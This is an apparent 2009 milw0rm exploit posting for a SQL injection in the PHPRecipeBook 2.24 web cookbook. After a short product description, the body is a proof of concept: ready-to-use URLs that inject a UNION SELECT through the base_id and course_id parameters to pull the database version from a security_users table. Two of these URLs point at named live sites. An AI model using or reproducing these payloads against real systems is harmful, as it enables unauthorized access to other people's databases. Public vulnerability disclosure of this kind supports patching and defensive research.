39 lines
No EOL
1.2 KiB
Text
39 lines
No EOL
1.2 KiB
Text
[+] PHPRecipeBook 2.24 (_id)Remort SQL Injection Vulnerability
|
|
[-]
|
|
[+] Discovered By d3b4g
|
|
[+] script: http://phprecipebook.sourceforge.net/demo/phprecipebook/
|
|
[+] Greetz : str0ke | Inerd | & friends
|
|
[-] Follow me on twitter www.twitter.com/schaba
|
|
|
|
|
|
About:
|
|
------>
|
|
PHPRecipeBook is a Web-based cookbook with the
|
|
ability to create shopping lists from recipes selected.
|
|
The lists can be saved and later reloaded and edited.
|
|
The shopping list also attempts to combine similar items
|
|
so that duplication does not occur.
|
|
|
|
|
|
|
|
/* start
|
|
|
|
0x1
|
|
|
|
Proof of concept
|
|
-------------------------------------
|
|
|
|
Exploit:http:localhost.com[path]index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
|
|
|
|
Demo:1 http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
|
|
|
|
Demo:2 http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
|
|
|
|
|
|
/* end
|
|
|
|
-------------------------------------
|
|
From Tiny Little island of Maldivies
|
|
-------------------------------------
|
|
|
|
# milw0rm.com [2009-03-09] |